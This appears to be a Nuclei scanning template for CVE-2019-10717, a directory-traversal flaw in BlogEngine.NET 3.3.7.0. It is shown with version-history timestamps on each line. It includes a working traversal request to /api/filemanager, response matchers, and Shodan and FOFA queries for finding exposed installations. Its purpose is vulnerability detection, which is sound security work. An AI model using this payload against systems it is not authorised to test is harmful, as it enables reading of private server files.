2022-08-01 07:58:09 +00:00
|
|
|
id: CVE-2019-10717
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
|
2022-08-01 07:58:09 +00:00
|
|
|
author: arafatansari
|
2022-08-01 11:02:39 +00:00
|
|
|
severity: high
|
2022-08-01 07:58:09 +00:00
|
|
|
description: |
|
2022-08-05 13:57:51 +00:00
|
|
|
BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
|
2023-09-06 12:53:28 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
|
2022-08-01 07:58:09 +00:00
|
|
|
reference:
|
|
|
|
- https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
|
2022-08-02 09:47:48 +00:00
|
|
|
- https://github.com/rxtur/BlogEngine.NET/commits/master
|
2022-08-05 13:57:51 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-10717
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://seclists.org/fulldisclosure/2019/Jun/44
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
2022-08-02 09:47:48 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
|
|
|
|
cvss-score: 7.1
|
|
|
|
cve-id: CVE-2019-10717
|
|
|
|
cwe-id: CWE-22
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.00351
|
|
|
|
epss-percentile: 0.71813
|
2023-09-06 12:53:28 +00:00
|
|
|
cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:*
|
2022-08-01 07:58:09 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:53:28 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: dotnetblogengine
|
|
|
|
product: blogengine.net
|
2023-09-06 12:53:28 +00:00
|
|
|
shodan-query: http.html:"Blogengine.net"
|
2024-05-31 19:23:20 +00:00
|
|
|
fofa-query: body="blogengine.net"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine
|
2022-08-01 07:58:09 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-01 11:02:39 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"
|
2022-08-01 07:58:09 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-08-02 09:10:56 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'
|
|
|
|
|
2022-08-01 11:02:39 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a004730450221008bc2a6df1ec661a1e058c80095a0bfb21803e5447c6ceb17f9238779c6efbe4902203cb9d1f4f1eaf708d7dd3286ed6feb15b39cf39f9de095868c2341cf5c89b294:922c64590222798bb761d5b6d8e72950
|